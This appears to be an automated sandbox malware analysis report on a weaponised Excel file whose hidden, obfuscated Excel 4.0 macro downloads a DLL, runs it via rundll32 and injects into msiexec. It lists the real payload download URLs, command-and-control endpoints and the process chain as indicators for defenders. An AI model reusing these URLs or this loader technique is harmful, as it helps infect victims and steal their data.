Loading ...

Play interactive tourEdit tour

Analysis Report case (1522).xls

Overview

General Information

Sample Name:case (1522).xls
Analysis ID:344663
MD5:933ac69cb772d6e28636a81fc7665a26
SHA1:7bb7870ebb261a2e0302600330abbc819d00acd3
SHA256:d4592471179f7d3fbd94be05591c09c74b0d8b7dcca580504694c7514c1d9ef0
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2464 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 2416 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
case (1522).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2260, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2464

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 4.2.rundll32.exe.2330000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 5.2.msiexec.exe.90000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2165783803.0000000002A80000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00091AF0 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicertP
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://crt.comod
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 77EE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: case (1522).xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/
    Source: msiexec.exe, 00000005.00000003.2168531557.00000000003AA000.00000004.00000001.sdmpString found in binary or memory: https://gadgetswolf.com/post.php
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.php_
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpi
    Source: msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/
    Source: msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/7
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/post.phpr
    Source: msiexec.exe, 00000005.00000002.2362168955.0000000002F60000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: case (1522).xls, 77EE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: case (1522).xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: case (1522).xlsInitial sample: CALL
    Source: case (1522).xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: case (1522).xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: case (1522).xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02333A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0234DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02339A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02345BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02339C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FD2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FBB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FD806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FF8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FDD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00099C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00093A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00099A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000ADA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A5BF0
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: ipnyw.dll.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A9C90 AdjustTokenPrivileges,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\77EE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD900.tmpJump to behavior
    Source: case (1522).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2165783803.0000000002A80000.00000004.00000001.sdmp, scfrd[1].dll.0.dr
    Source: case (1522).xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: case (1522).xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0233D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0235EA51 push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02359A5D push ebp; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023582EB push eax; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023F93ED push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0235D1F2 push dword ptr [ecx]; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0235E9FA push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0235B700 push ss; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0235B56F push esp; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02412B73 push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
